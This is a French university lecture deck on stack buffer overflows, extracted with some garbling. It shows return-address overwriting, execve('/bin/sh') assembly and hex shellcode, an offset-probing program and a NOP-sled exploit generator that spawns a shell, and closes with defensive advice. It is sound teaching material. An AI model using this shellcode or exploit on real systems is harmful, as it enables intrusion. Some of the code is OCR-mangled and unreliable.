Une mauvaise utilisation des variables automatiques

Un peu de code octal

Du code dans la pile?

Placer le piège

Ce n'est pas s

En tout cas, ne pas déborder les tampons

### Pratique du C Débordement de tampon

Licence Informatique — Université Lille 1 Pour toutes remarques : Alexandre.Sedoglavic@univ-lille1.fr

Semestre 5 — 2013-2014

### **Avertissement**

Une mauvaise utilisation des variables automatiques

Un peu de cod octal

Du code dans l pile?

Placer le piège

Ce n'est pas s simple

En tout cas, ne pas déborder les tampons

Les codes de bas niveau suivants correspondent à une architecture — pentium — aujourd'hui obsolète.

Les principes généraux restent tout de même valables sur les machines actuelles.

L'objectif principal est d'illustrer l'usage de la pile tout en sensibilisant au maximum l'auditoire à la nécessité de la *pratique* du langage.

Quand on a dépassé les bornes, il n'y a pas de limite.

Une mauvaise utilisation des variables automatiques

Un peu de code

Du code dans pile?

Placer le pièg

Ce n'est pas simple

En tout cas, ne pas déborder le tampons

# Technique du débordement de pile : un problème d'utilisation de la pile d'exécution

La technique de débordement de pile est trés utilisée pour exécuter du code malveillant. Pour ce faire, il faut qu'une application critique présente une vulnérabilité. Par exemple :

La condition d'arrêt '\xF8' est adoptée pour simplifier la suite de nos manipulations.

www.fil.univ-lille1.fr/~sedoglay/C/Cours10.pdf

Une mauvaise utilisation des variables automatiques

Un peu de code

Du code dans

Placer le piège

Ce n'est pas s

En tout cas, ne pas déborder les tampons

La fonction getchar pourrait être remplacée par n'importe quelle fonction remplissant la mémoire tampon à partir d'une socket, du clavier, etc. L'erreur de programmation est d'autoriser à écrire plus de TAILLE octets dans tampon.

%ESP	tampon	
	var. loc.	
%EBP	%EBP1	
	adresse	
	de retour	
	paramètres	
	:	
	•	

La fonction getchar ne vérifie pas le nombre d'octets qu'elle copie dans le buffer tampon.

Si par erreur le tampon est rempli, elle continue malgrès tout son travail et écrase l'adresse de retour ce qui provoque une erreur lors du ret.

L'instruction exécutée après le ret est celle se trouvant à l'adresse spécifiée par ce que getchar à placée sur la pile.

Une mauvaise utilisation des variables automatiques

Un peu de cod

Du code dans I pile?

Placer le pièg

Ce n'est pas simple

En tout cas, ne pas déborder les tampons

# Le débordement de pile proprement dit : exemple d'écrasement de l'adresse de retour

Le débordement de pile consiste à modifier l'adresse de retour à l'exemple du code suivant :

```
#include <stdio.h>
void
                           int
function
                           main
(void){
                          (void){
  int foo =
                              int x = 0;
  int *ret = &foo :
                              function();
                              x = 1:
   ret += 3 :
                              printf("%d\n",x);
  (*ret) += 7 :
                              return 0:
```

L'exécution de ce programme affiche 0 et non 1. Attention, cette astuce est intimement liée à l'architecture de l'ordinateur exécutant le code.

Une mauvaise utilisation des variables automatiques

Un peu de cod

Du code dans pile?

Placer le pièg

Ce n'est pas

En tout cas, ne pas déborder les

avant le call

x = 0

main %EBP

après le call

adresse de retour

$$x = 0$$
main %EBP

dans function

ret = &foo foo = 0 adresse de retour x = 0 main %EBP

- ▶ Initialement, le pointeur ret dans la pile pointe sur la variable foo.
- ▶ Après incrémentation de 1, le pointeur ret pointe sur l'adresse de retour.
- On peut ainsi incrémenter cette dernière et ne pas exécuter l'instruction suivant le call dans la fonction appelante i.e. l'affectation de 1 à x dans la fonction main (à condition de savoir sur combien d'octets elle est codée).

Une mauvaise utilisation des

### Un peu de code

Du code dans l

Placer le piège

Ce n'est pas s

En tout cas, ne pas déborder les tampons

### Quel code voudrait on voir s'exécuter

Prenons maintenant la question sous un autre angle : quelles instructions devrions nous faire exécuter pour contrôler la ressource exécutant le code vulnérable? Si on dispose d'appels système, d'un shell et de commandes externes, tout est permis :

Dans ce cas, un shell est ouvert à l'agresseur qui peut faire ce qu'il veut avec les droits du propriétaire du code attaqué. Un dévermineur permet de voir ce que fait le processeur en exécutant ce code. Mais comme nous maîtrisons l'assembleur, utilisons le.

```
Pratique du C
Débordement de
   tampon
```

Un peu de code octal

```
Traduction en code assembleur
```

Le code précédent s'exprime en assembleur par un appel système (codé par une interruption plutôt qu'un call execve):

```
.text
txt:
     .string "/bin/sh"
     .long txt
     .long 0
.globl _start
start:
     movl $0xb, %eax
                        /* num\'ero de l'appel syst\'eme
                                                             */
                        /* nom du programme \'a ex\'ecuter
     movl $txt, %ebx
     movl $txt+8,%ecx
                        /* argument du shell
                                                             */
     movl %ecx,%edx
                        /* variables d'environnement
                                                             */
     addl $4,%edx
     int $0x80
done:
```

```
$0,%ebx /* Ces instructions permettent de
movl
                 /* terminer l'ex\'ecution du code
Tvom
        $1.%eax
                                                       */
                 /* assembleur et sont indispensables
int.
        $0x80
```

4日 > 4周 > 4 至 > 4 至 >

www.fil.univ-lille1.fr/~sedoglay/C/Cours10.pdf

### Après compilation et avant édition de liens

Un peu de code octal

```
.text
                       .string "/bin/sh"
0000 2F62696E txt:
     2F736800
00000000
                       .long txt
                                       /* En prime on obtient
000c 00000000
                       .long 0
                       .globl _start
0010 B80B0000 _start: movl $0xb, %eax
     00
0015 BB000000
                       movl $txt, %ebx
     00
001a B9080000
                       movl $txt+8, %ecx
     00
001f 89CA
                       movl
                             %ecx,%edx
0021 83C204
                             $4.%edx
                       addl
0024 CD80
                             $0x80
                       int
0026 BB000000 done:
                       Tvom
                             $0, %ebx
     00
                             $1, %eax
002b B8010000
                       movl
     00
0030 CD80
                             $0x80
                       int
```

\*/

m\^eme le code

segment de code

ex\'ecut\'e par

la machine

correspondant i.e. le code dans le

hexad\'ecimal

### Adressage relatif des étiquettes

Une mauvaise utilisation des variables automatiques

### Un peu de code octal

Du code dans pile?

Placer le piège

Ce n'est pas s simple

En tout cas, ne pas déborder les tampons

Le premier problème rencontré est que l'on ne sait pas où ce trouve les données de notre programme en mémoire i.e. on ne connaît pas l'étiquette txt.

Pour s'en sortir, on se sert de la pile — une fois encore — et du fait que les instructions call et jmp peuvent prendre un argument relatif (une constante).

Si on place un call juste avant les données, l'adresse de retour — correspondant aux données — sera empilée et pourra être dépilée avec un pop.

Il ne restera plus qu'à récupérer cette adresse et brancher sur le code que l'on désire exécuter.

```
Pratique du C
Débordement de
tampon
```

Une mauvaise utilisation des variables

Un peu de code

Du code dans pile?

Placer le piège

Ce n'est pas si simple

En tout cas, ne pas déborder les tampons

### Application de ce principe

```
0000 E8100000 call .+0x15

00

0005 2F62696E .string "/bin/sh"

2F736800

000d 00000000 .long 0
```

.long 0

0011 00000000

00

0015 5B pop %ebx /\* adresse de "/bin/sh" \*/
0016 895B08 movl %ebx,8(%ebx) /\* placer le pointeur \*/
0019 B80B0000 movl \$0xb,%eax /\* num\'ero de l'appel \*/

/\* pour un pointeur

/\* pour sortir proprement \*/

www.fil.univ-lille1.fr/~sedoglay/C/Cours10.pdf

/\* NULL

\*/

\*/

001e 8D4B08 leal 8(%ebx), %ecx 0021 8D530C leal 12(%ebx), %edx 0024 CD80 int. \$0x80

0024 0000 int \$0,%ebx

002b B8010000 movl \$1,%eax
00 CD80 int \$0x80

Ce code ne peut pas marcher comme un processus normal car il écrit dans le segment de code... mais on peut le faire par débordement.

Une mauvaise utilisation des variables automatiques

Un peu de code octal

Du code dans la pile?

Placer le piège

Ce n'est pas s

En tout cas, ne pas déborder les tampons

### Comment tester notre code

int main(void){ bar() ; return 0 ; }

Le code exécutable ci-dessus peut être placé dans une variable automatique :

```
void bar(void){
           int foo, *pfoo = &foo ;
           char shellcode[] = \frac{xE8}{x10}x00\\x00\\x00\\x2F\\x62\\x69\\x6E
                                                                                                                    "\x2F\x73\x68\x00\x00\x00\x00\x00\x00"
                                                                                                                    \xspace"\x00\x00\x5B\x89\x5B\x08\xB8\x0B"
                                                                                                                    \xspace{1.5} \xs
                                                                                                                    "\xCD\x80\xBB\x00\x00\x00\x00\xB8\x01"
                                                                                                                    "\x00\x00\x00\xCD\x80" :
/* canoniquement void (*foo)()=(void *) shellcode; foo();*/
/* mais pour notre propos, \'ecrasons l'adresse de retour */
           *(pfoo+5) = shellcode ; /* heureusement, C est laxiste */
```

Le shellcode pourrait être stocké dans un fichier texte lu par le code vulnérable.

4日 > 4周 > 4 目 > 4 目 > 目

### Pourquoi la pile serait-elle exécutable?

Avec un peu de chance i.e. une architecture laxiste, le code sur la pile est exécuté :

% ./mshell sh-2.05b%

En théorie, chaque segment (données, code, pile) est indépendant des autres et l'accès est contrôlé. Depuis le 80386, des mécanismes physiques interdisent d'exécuter le contenu d'un segment hors code. Mais en pratique (au moins pour Linux et Windows), certains segments sont partagés (ss, ds, es) et d'autres se recouvrent (cs) :

cs	0x23	35	ds	0x2b	43
SS	0x2b	43	es	0x2b	43

En effet, l'adressage d'un segment se fait sur 2<sup>32</sup> octets i.e. 4 giga octets (toute la mémoire actuellement disponible).

Une mauvais utilisation de variables automatiques

Du code dans la pile?

Placer le piège

C- --'---

En tout cas, ne pas déborder les

Une mauvaise utilisation des variables automatiques

Un peu de codoctal

Du code dans la pile?

Placer le pièg

Ce n'est pas simple

En tout cas, ne pas déborder le tampons

### Déterminer la distance entre le début du buffer du code vulnérable et l'adresse de retour

Pour connaître les limites, on peut pousser à la faute. Dans notre cas, on peut soumettre des fichiers de plus en plus grand au programme vulnérable :

```
#include<stdio.h>
#include<stdlib.h>
int main(int argc, char **argv){
  int i:
  if(argc!=2)
    return 1;
 FILE *fichier = fopen("piege","w") ;
  i = atoi(argv[1]);
                                        % ./taillebuffer 99
                                        % ./vulnerable
 for(;i>0;i--)
    fputc('a',fichier) ;
                                        % ./taillebuffer 100
                                        % ./vulnerable
 fputc('\xF8',fichier);
                                        Segmentation fault
 fclose(fichier) ;
                                        */
```

return 0:

## Quelle doit être la nouvelle adresse de retour?

La fonction suivante retourne le pointeur de pile :

Une mauvaise utilisation des variables automatiques

Un peu de cod octal

Du code dans I pile?

Placer le piège

Ce n'est pas simple

En tout cas, ne pas déborder les tampons

On connaît la distance entre le début du buffer et l'adresse de retour. De plus, on peut — dans notre cas — avoir une vague idée de l'adresse du sommet de la pile.

La pile est partagée par plusieurs processus apparentés et on peut parier sur la taille des empilements fait par le code cible avant de passer dans la zone vulnérable.

adresse de retour = ancien pointeur de pile + taille buffer + imprécisions

Encore une fois, chaque pile associée à un processus devrait être indépendante des autres... mais ce n'est pas le cas.

# Mise en place du piège, gestion de l'imprécision, etc.

Une mauvaiso utilisation des variables automatiques

Un peu de cod octal

Du code dans l

Placer le piège

Ce n'est pas s

En tout cas, ne pas déborder les tampons Mais tout cela reste approximatif. Comment s'en contenter alors que l'adresse de la prochaine instruction à exécuter doit être précise?

L'instruction assembleur nop (ne rien faire) codée en hexadécimal par 90 peut compléter notre shellcode sans perturber son fonctionnement.

Il suffit de commencer à remplir le buffer avec cette instruction. Même si l'adresse de retour est trop grande, l'instruction désignée sera un nop et tous les nop seront exécuter sans conséquence avant l'exécution du shellcode.

De plus, on s'autorise plusieurs tentatives en faisant varier la taille du buffer par exemple.

### Plaçons le piège

Une mauvaise utilisation des variables automatiques

Un peu de code

Du code dans la pile?

Placer le piège

Ce n'est pas simple

En tout cas, ne pas déborder les tampons

```
#include<stdio h>
#define SHELLCODESIZE 50
char shellcode[] = "\xE8\x10\x00\x00" etc. "\x00\xCD\x80";
int main(int argc, char **argv){
  unsigned long int i, taille, base ;
  base = strtoul(argv[2],NULL,0) ;
  base -= taille = strtoul(argv[1],NULL,0) ;
  base -= strtoul(argv[3],NULL,0);
  for( i=0 ; i<taille-SHELLCODESIZE ; i++)</pre>
    putchar('\x90');
  for( i=0 ; i<SHELLCODESIZE ; i++)</pre>
    putchar(shellcode[i]);
  char * res = (char *) \&base :
  for(i=0;i<sizeof(int);i++) /* le piege fonctionne</pre>
    putchar(*(res+i));
                              %exploit 108 'SommetPile' 0>piege
  putchar('\xF8');
                              % vulnerable
  return 0:
                              sh-2.05b$
                              */
```

Une mauvaiso utilisation des variables automatiques

Un peu de codoctal

Du code dans la pile?

Placer le piège

Ce n'est pas si simple

En tout cas, ne pas déborder les tampons

### Quelques remarques

Il existe des architectures n'utilisant pas le passage de paramètres par la pile (PowerPC pour un petit nombre de paramètres par exemple — mais pour un grand nombre, une pile d'exécution est utilisée).

Attention le cas échéant à supprimer l'ensemble des 0 — sinon un scanf par exemple le prendrait pour la fin de la chaîne à charger. Pour s'en sortir il faut écrire du code équivalent :

```
\xB8\x0B\x00\x00\x00 movl $0xb,%eax
\x31\xC0 xor %eax,%eax /*mets %eax \'a z\'ero*/
\xB0\x0B movb $0xb,%al
```

C'est du beau "computer art", une disparition à la Perec...
Le choix de la condition d'arrêt ('\xF8') dans notre exemple provient du fait qu'EOF est codé par ('\xFF') et que ce caractère intervient dans la définition de l'adresse à laquelle on veut brancher dans la pile : le shell code n'est donc pas lu jusqu'au bout.

Une mauvaise utilisation des variables automatiques

Un peu de cod octal

Du code dans pile?

Placer le piège

Ce n'est pas si simple

En tout cas, ne pas déborder les tampons

### Comment placer notre piège

Il faut découvrir une faiblesse dans le code attaqué :

- ▶ soit on désassemble le code (consulter le code octal);
- ▶ soit on consulte les faiblesses publiées par le concepteur du programme (ou les utilisateurs).

Ensuite, il ne reste plus qu'à préparer le piège — construire le code assembleur ouvrant une faille — et le soumettre à la cible :

- dans notre cas, mettre le piège dans un fichier et le faire lire par le code vulnérable;
- pour l'attaque d'un serveur, scanner systématiquement les ports de machines pour voir s'ils abritent un service vulnérable.

Le code piège peut ne pas être un fichier mais dans des paquets soumis à un serveur qui lit sur un port de la machine cible...

En 2001, CodeRed a infecté 400 000 serveurs windows en utilisant un débordement de pile.

### Morale à retenir

Une mauvaise utilisation des variables automatiques

Un peu de code

Du code dans l pile?

Placer le piège

Ce n'est pas si

En tout cas, ne pas déborder les tampons

Il est important de toujours tenir compte de la taille des tampons et de faire attention lors de l'usage de fonctions :

proscrire	utiliser	
gets	fgets	
strcpy	strncpy	
strcat	strncat	
scanf, sprintf, etc.		

Certains compilateur prennent en charge l'interdiction du débordement de tampon (patch StackShield pour gcc).

Un fichier au format ELF contient un drapeau indiquant si le noyau ou l'éditeur de liens dynamique doivent considérer la pile comme exécutable ou pas. Le programme execstack permet de manipuler ce drapeau.